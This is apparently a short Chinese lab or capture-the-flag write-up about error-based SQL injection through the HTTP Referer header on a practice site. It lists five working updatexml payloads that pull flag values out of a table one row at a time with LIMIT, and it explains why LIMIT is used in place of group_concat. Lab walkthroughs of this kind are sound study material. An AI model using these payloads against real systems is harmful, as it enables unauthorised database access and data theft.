head(一)
注入环境:http://inject2.lab.aqlab.cn:81/Pass-08/index.php
废话就不多说了,不懂的直接看上一篇head(一)
我们可以看到核心代码是插入uagent和uname
而uagent是来自HTTP_REFERER,获取上一次的URL地址
这里和head(一)只是位置换了,head(一)是插入的请求头,而head(二)是插入的上一次的URL地址,
那么方法还是一样的,就直接做最后一步
获取字段值
注意
这里因为是用updatexml函数报错输出我们想要的数据,但输出的内容有限,不能输出太多,准确来说应该是每每个输出有限,比如完整的是 qqqqq,wwwww 但可能输出就变成了qqq,www了
所有我们这里不能用group_concat函数一行输出了
这里我们用的是limit函数
'or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 0,1)),1),1)#
'or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 1,1)),1),1)#
'or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 2,1)),1),1)#
'or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 3,1)),1),1)#
'or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 4,1)),1),1)#
接下来就是一直替换limit 前一个数的值,来查看所有字段值
就成功了